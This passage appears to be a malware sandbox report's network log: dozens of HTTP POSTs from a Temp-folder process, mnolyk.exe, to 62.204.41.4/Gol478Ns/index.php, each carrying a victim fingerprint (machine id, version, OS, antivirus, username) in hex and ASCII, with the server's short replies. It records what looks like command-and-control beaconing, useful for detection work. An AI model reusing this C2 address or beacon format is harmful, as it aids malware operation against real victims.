                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:17.064486027 CET | 599 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    4 | 192.168.2.3 | 49705 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:10.447077036 CET | 204 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:10.509819984 CET | 205 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    40 | 192.168.2.3 | 49742 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:26.717820883 CET | 241 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:26.779829025 CET | 241 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    400 | 192.168.2.3 | 50103 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:17.234939098 CET | 600 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:17.299627066 CET | 600 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    401 | 192.168.2.3 | 50104 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:17.483711958 CET | 601 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:17.548576117 CET | 601 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    402 | 192.168.2.3 | 50105 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:17.766341925 CET | 602 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:17.830234051 CET | 602 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    403 | 192.168.2.3 | 50106 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:17.996325016 CET | 603 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:18.061194897 CET | 603 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    404 | 192.168.2.3 | 50107 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:18.237085104 CET | 604 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:18.299196005 CET | 604 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    405 | 192.168.2.3 | 50108 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:18.466114998 CET | 605 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:18.529956102 CET | 605 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    406 | 192.168.2.3 | 50109 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:18.709114075 CET | 606 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:18.770656109 CET | 606 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    407 | 192.168.2.3 | 50110 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:18.949775934 CET | 607 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:19.012985945 CET | 607 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    408 | 192.168.2.3 | 50111 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:19.185502052 CET | 608 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:19.249695063 CET | 608 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    409 | 192.168.2.3 | 50112 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:19.423662901 CET | 609 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:19.488576889 CET | 609 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    41 | 192.168.2.3 | 49743 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:26.963196993 CET | 242 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:27.027477980 CET | 242 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    410 | 192.168.2.3 | 50113 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:19.670653105 CET | 610 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:19.733382940 CET | 610 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    411 | 192.168.2.3 | 50114 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:19.934148073 CET | 611 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:20.010862112 CET | 611 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    412 | 192.168.2.3 | 50115 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:20.219232082 CET | 612 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:20.285139084 CET | 612 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    413 | 192.168.2.3 | 50116 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:20.457300901 CET | 613 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:20.523432016 CET | 613 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    414 | 192.168.2.3 | 50117 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:20.704452038 CET | 614 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:20.767275095 CET | 614 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    415 | 192.168.2.3 | 50118 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:20.945394039 CET | 615 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
